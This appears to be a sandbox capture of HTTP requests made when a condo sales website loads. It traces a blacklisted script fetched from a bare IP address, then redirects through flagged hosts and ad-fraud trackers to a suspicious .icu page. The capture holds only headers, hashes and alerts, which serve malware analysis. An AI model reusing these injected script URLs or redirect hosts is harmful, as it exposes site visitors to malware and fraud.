Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:43 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.11.2 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:38 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/uploads/2016/10/the-one-condos.png HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Content-Length: 15958
Connection: keep-alive
Last-Modified: Wed, 12 Oct 2016 02:56:49 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 282 x 69, 8-bit/color RGB, non-interlaced
Size:   15958
Md5:    64994d5ec763c4a2c5b8e6389c096735
Sha1:   6ff0f685f9ea049dc7f71972e24a43be5915cd57
Sha256: b09194d1adadf291ea64b97841b479b4df8f3cf480fa7ee2deac756da2c03baf
                                        
                                            GET /jquery.js HTTP/1.1 
Host: 134.249.116.78
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         134.249.116.78
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sun, 02 Dec 2018 13:09:44 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Fri, 23 Nov 2018 00:04:43 GMT
Etag: "1e17-57b49baf6567e"
Accept-Ranges: bytes
Content-Length: 7703
Connection: close


--- Additional Info ---
Magic:  ASCII C++ program text, with very long lines
Size:   7703
Md5:    dee1510f3c8cfa55047c6a0041cab6a7
Sha1:   4e3f098926ae626c2e429bd6b1b815800933726b
Sha256: 6ce31fff8e085be331d9d4dfed19eb84788da2ff671f492afb0f4ce1ef712826

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /index.php?cnt=23180211 HTTP/1.1 
Host: 185.143.221.14
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         185.143.221.14
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sun, 02 Dec 2018 13:09:45 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: __cfbuid=1; expires=Wed, 05-Dec-2018 13:09:45 GMT; Max-Age=259200
Content-Length: 709
Connection: close


--- Additional Info ---
Magic:  HTML document text
Size:   709
Md5:    f2ad116050667c4601c51cffaae0a273
Sha1:   8e3f4452118b3764bd0fa83d50933e0609e84eb4
Sha256: 0ea7c3a52aabc55f149261af5e1736db8c5eb7752737051739c69b18c7ae5c2f

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: 185.143.221.14
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __cfbuid=1

                                         
                                         185.143.221.14
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Date: Sun, 02 Dec 2018 13:09:45 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Mon, 11 Dec 2017 09:00:56 GMT
Etag: "1536-5600cc5aee200"
Accept-Ranges: bytes
Content-Length: 5430
Connection: close


--- Additional Info ---
Magic:  MS Windows icon resource - 2 icons, 16x16, 256-colors
Size:   5430
Md5:    f3418a443e7d841097c714d69ec4bcb8
Sha1:   49263695f6b0cdd72f45cf1b775e660fdc36c606
Sha256: 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "6226B03DB676E5D11EF7E41BD0842B5A1305C00CA30DAFA03CF3C0A71BF6740B"
Last-Modified: Fri, 30 Nov 2018 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16636
Expires: Sun, 02 Dec 2018 17:47:02 GMT
Date: Sun, 02 Dec 2018 13:09:46 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    763fbda1e837e2d227eddf6d54b3fafe
Sha1:   5dcee05c38f3ffbe2c3bb4b02b6b890e3e19ff60
Sha256: 6226b03db676e5d11ef7e41bd0842b5a1305c00ca30dafa03cf3c0a71bf6740b
                                        
                                            POST / HTTP/1.1 
Host: isrg.trustid.ocsp.identrust.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.121
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Transfer-Encoding: Binary
Last-Modified: Fri, 30 Nov 2018 20:42:41 GMT
Etag: "b595a6294de968bdfdeb7bd34f1f0f798f89bc5f"
Content-Length: 1398
Cache-Control: public, no-transform, must-revalidate, max-age=21887
Expires: Sun, 02 Dec 2018 19:14:33 GMT
Date: Sun, 02 Dec 2018 13:09:46 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1398
Md5:    fab9be802c64141810f88b453196df0c
Sha1:   b595a6294de968bdfdeb7bd34f1f0f798f89bc5f
Sha256: 602abc9d87fabebcb6c827c38bc8222b73d9e986e08f30a5c06e56a7c879492f
                                        
                                            GET /ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d HTTP/1.1 
Host: www.hibids10.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://185.143.221.14/index.php?cnt=23180211

                                         
                                         199.193.73.38
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14857833; expires=Mon, 03 Dec 2018 13:09:47 GMT ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ICJpZCI6MTQ4NTc4MzMsImsiOiI5YTk4NDM5ZTVkY2RmNGZkMmEwMTFmN2NiYzc2YjAwZCIsInNpZCI6IiIsImlzaWQiOjIsImFzaWQiOjEsInppZCI6MTEyNjg3LCJwaWQiOjg5Njk4LCJhbiI6dHJ1ZSwibGFuIjp0cnVlLCJjaWQiOjI4LCJhaWQiOjI4LCJwdCI6NCwicGsiOiJ5a3duc3h3ejI5In0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjEwNDUwNiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MTc1NTgsImJuIjoiRmlyZWZveCIsImJ2IjoiMy42Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MTYyLCJjIjoiTk8iLCJuIjoiTm9yd2F5In0sImEiOmZhbHNlLCJjciI6eyJuIjoiQnJvYWRuZXQgQVMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiJodHRwOi8vMTg1LjE0My4yMjEuMTQvaW5kZXgucGhwP2NudD0yMzE4MDIxMSJ9fQ.0yQfas0mSX2SrLkckf1-RGYzfoLKPnggQ1RcLVp9E9s; expires=Sun, 02 Dec 2018 13:10:47 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1236
Md5:    b49ed0aacfe99b14890f9ff20cd61d78
Sha1:   7a906851bd20049956b22bf50fe1a7b2b2721d0a
Sha256: 1a6c7396ff048899cf66d78fe24ede2d926b4cc66d637dd647bc180eedc0c8d4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "C9040A687C5989316931EF37B6FA6A5E31EDDBA4462593526114E8F1AF49AEFF"
Last-Modified: Sun, 02 Dec 2018 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9720
Expires: Sun, 02 Dec 2018 15:51:47 GMT
Date: Sun, 02 Dec 2018 13:09:47 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    13ff1c1bff0ccc85fa95a355b45049a7
Sha1:   d3ed13515ed63d393b72f848672a971dc09ef529
Sha256: c9040a687c5989316931ef37b6fa6a5e31eddba4462593526114e8f1af49aeff
                                        
                                            GET /stats HTTP/1.1 
Host: r.remarketingpixel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.hibids10.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d
Origin: https://www.hibids10.com

                                         
                                         23.111.224.2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:47 GMT
Content-Length: 40
Connection: keep-alive
Access-Control-Allow-Origin: https://www.hibids10.com
Access-Control-Allow-Credentials: true
Set-Cookie: uid_id2=bbf6d23b-e76e-4292-af73-4b78c5667cc7:2:2; expires=Wed, 29 Nov 2028 13:09:47 GMT; domain=.remarketingpixel.com
Expires: Sun, 02 Dec 2018 13:09:47 GMT
Cache-Control: max-age=0, : no-cache


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   40
Md5:    93d305f951f8e7628404c5a8c90e2eb0
Sha1:   bd05bde1a423e6ed7e925f0094cdd2b0a30579c7
Sha256: bbb37bd1c637274176731f8653144b996bf4a17a349efce8ebb582ff96acf97c
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.hibids10.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ICJpZCI6MTQ4NTc4MzMsImsiOiI5YTk4NDM5ZTVkY2RmNGZkMmEwMTFmN2NiYzc2YjAwZCIsInNpZCI6IiIsImlzaWQiOjIsImFzaWQiOjEsInppZCI6MTEyNjg3LCJwaWQiOjg5Njk4LCJhbiI6dHJ1ZSwibGFuIjp0cnVlLCJjaWQiOjI4LCJhaWQiOjI4LCJwdCI6NCwicGsiOiJ5a3duc3h3ejI5In0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjEwNDUwNiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MTc1NTgsImJuIjoiRmlyZWZveCIsImJ2IjoiMy42Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MTYyLCJjIjoiTk8iLCJuIjoiTm9yd2F5In0sImEiOmZhbHNlLCJjciI6eyJuIjoiQnJvYWRuZXQgQVMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiJodHRwOi8vMTg1LjE0My4yMjEuMTQvaW5kZXgucGhwP2NudD0yMzE4MDIxMSJ9fQ.0yQfas0mSX2SrLkckf1-RGYzfoLKPnggQ1RcLVp9E9s; cjs=t

                                         
                                         199.193.73.38
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:47 GMT
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            GET /ykwnsxwz29?shu=aa616a03e97d864ba15ecc5fd4dfcce2a0b59cf3b7ead1d9fa246ad795b62045962d8a127eb8b882b0404b8020719e5e4d927c8ac12dc7f3bc873f41afdec0bfa34d8e604aba91ec4a&pst=1543756247&rmtc=t&uuid=bbf6d23b-e76e-4292-af73-4b78c5667cc7%3A2%3A2&pii=&in=false&refer=http%3A%2F%2F185.143.221.14%2Findex.php%3Fcnt%3D23180211&key=9a98439e5dcdf4fd2a011f7cbc76b00d HTTP/1.1 
Host: www.hibids10.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.hibids10.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ICJpZCI6MTQ4NTc4MzMsImsiOiI5YTk4NDM5ZTVkY2RmNGZkMmEwMTFmN2NiYzc2YjAwZCIsInNpZCI6IiIsImlzaWQiOjIsImFzaWQiOjEsInppZCI6MTEyNjg3LCJwaWQiOjg5Njk4LCJhbiI6dHJ1ZSwibGFuIjp0cnVlLCJjaWQiOjI4LCJhaWQiOjI4LCJwdCI6NCwicGsiOiJ5a3duc3h3ejI5In0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjEwNDUwNiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MTc1NTgsImJuIjoiRmlyZWZveCIsImJ2IjoiMy42Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MTYyLCJjIjoiTk8iLCJuIjoiTm9yd2F5In0sImEiOmZhbHNlLCJjciI6eyJuIjoiQnJvYWRuZXQgQVMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiJodHRwOi8vMTg1LjE0My4yMjEuMTQvaW5kZXgucGhwP2NudD0yMzE4MDIxMSJ9fQ.0yQfas0mSX2SrLkckf1-RGYzfoLKPnggQ1RcLVp9E9s; cjs=t

                                         
                                         199.193.73.38
HTTP/1.1 302 Found
Content-Type: text/html
                                        
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:47 GMT
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: https://adsheads.go2affise.com/click?pid=11&offer_id=4635&sub1=VjN8MTQ4NTc4MzN8MTY3NDM0MXwxMDQ1MDZ8MTU0Mzc1NjE4N3xiYmY2ZDIzYi1lNzZlLTQyOTItYWY3My00Yjc4YzU2NjdjYzd8NzcuNDAuMTI5LjEyM3wxfHNoPWFhNjE2YTAzZTk3ZDg2NGJhMTVlY2M1ZmQ0ZGZjY2UyYTBiNTljZjNiN2VhZDFkOWZhMjQ2YWQ3OTViNjIwNDU5NjJkOGExMjdlYjhiODgyYjA0MDRiODAyMDcxOWU1ZTRkOTI3YzhhYzEyZGM3ZjNiYzg3M2Y0MWFmZGVjMGJmYTM0ZDhlNjA0YWJhOTFlYzRhfDk3YmE1M2I0NTFjYmE2ZmI5NjExYzJlYmRmOWEwNGMw&sub2=14857833
Set-Cookie: uid_id2=bbf6d23b-e76e-4292-af73-4b78c5667cc7:2:2; expires=Sun, 09 Dec 2018 13:09:47 GMT iprc9c4cc1faa645553fd9829e3120285a43=1674341; expires=Sun, 02 Dec 2018 14:09:47 GMT pdhtkv=true; expires=Mon, 03 Dec 2018 13:09:47 GMT uncs=1; expires=Mon, 03 Dec 2018 13:09:47 GMT pdhtkv28=true; expires=Mon, 03 Dec 2018 13:09:47 GMT uncs28=1; expires=Mon, 03 Dec 2018 13:09:47 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            POST / HTTP/1.1 
Host: ocsp.godaddy.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 108
Content-Type: application/ocsp-request

                                         
                                         50.63.243.230
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=90611, public, no-transform, must-revalidate
Last-Modified: Sun, 02 Dec 2018 03:39:29 GMT
Expires: Mon, 03 Dec 2018 15:39:29 GMT
Etag: "5609f0b41a2e339dcfc90028fe2fdb928e4a7753"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1778
Connection: close


--- Additional Info ---
Magic:  data
Size:   1778
Md5:    b546b6f5cd844cf31f9d117807a8f4b5
Sha1:   5609f0b41a2e339dcfc90028fe2fdb928e4a7753
Sha256: 58fe953ec00e7015895a5e59ad5d828ccbded6d813133379ac06604b96fccb65
                                        
                                            GET /click?pid=11&offer_id=4635&sub1=VjN8MTQ4NTc4MzN8MTY3NDM0MXwxMDQ1MDZ8MTU0Mzc1NjE4N3xiYmY2ZDIzYi1lNzZlLTQyOTItYWY3My00Yjc4YzU2NjdjYzd8NzcuNDAuMTI5LjEyM3wxfHNoPWFhNjE2YTAzZTk3ZDg2NGJhMTVlY2M1ZmQ0ZGZjY2UyYTBiNTljZjNiN2VhZDFkOWZhMjQ2YWQ3OTViNjIwNDU5NjJkOGExMjdlYjhiODgyYjA0MDRiODAyMDcxOWU1ZTRkOTI3YzhhYzEyZGM3ZjNiYzg3M2Y0MWFmZGVjMGJmYTM0ZDhlNjA0YWJhOTFlYzRhfDk3YmE1M2I0NTFjYmE2ZmI5NjExYzJlYmRmOWEwNGMw&sub2=14857833 HTTP/1.1 
Host: adsheads.go2affise.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.hibids10.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d

                                         
                                         212.32.250.1
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: afclick=5c03d99cf50336000148e369; Expires=Mon, 02 Dec 2019 13:09:48 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   221
Md5:    cfe09a7d498f74a7badefb8c4d21a94c
Sha1:   232c50ee0c736320dbd93aafaf6141548c862775
Sha256: 88cddd0bcb6211390afb87cf533e2b0044b6e36414642c7b65192752aca59312
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: adsheads.go2affise.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: afclick=5c03d99cf50336000148e369

                                         
                                         212.32.250.1
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   125
Md5:    239540730a71a3ab34f1c0f1f87ae03e
Sha1:   4fd8d8975e2d3404e8ac5e2721c1b647ae65d59c
Sha256: 36d5cec09fddadf8132407e8f8c56956c85367dc3d598a1531214a55cca6b368
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "C143C7C4EEE5394F58E40789AB486FDE4657492AEB5E69E194F12F0503EB2DA3"
Last-Modified: Thu, 29 Nov 2018 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=17794
Expires: Sun, 02 Dec 2018 18:06:22 GMT
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    2a2ac614f3af035df4710d67379246d9
Sha1:   8a984ae629b4a97445f8680fa72f1b922a3901aa
Sha256: c143c7c4eee5394f58e40789ab486fde4657492aeb5e69e194f12f0503eb2da3
                                        
                                            GET /BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833 HTTP/1.1 
Host: savegreatdowngradetheclicks.icu
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         51.158.26.248
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: session=afea4cdb-408c-4169-b389-a3c0a206c214
Server: nginx


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   3848
Md5:    95dc97eac04394b8dac849434a5c17ad
Sha1:   613bbd1059aa77d79254fdef9f1b625f90c185a5
Sha256: 9b193f080b3bf299ce1cd8689911eb4d5f110eee3541f383ddfe8221bb409732
                                        
                                            GET /client-m.js HTTP/1.1 
Host: savegreatdowngradetheclicks.icu
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://savegreatdowngradetheclicks.icu/BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833
Cookie: session=afea4cdb-408c-4169-b389-a3c0a206c214

                                         
                                         51.158.26.248
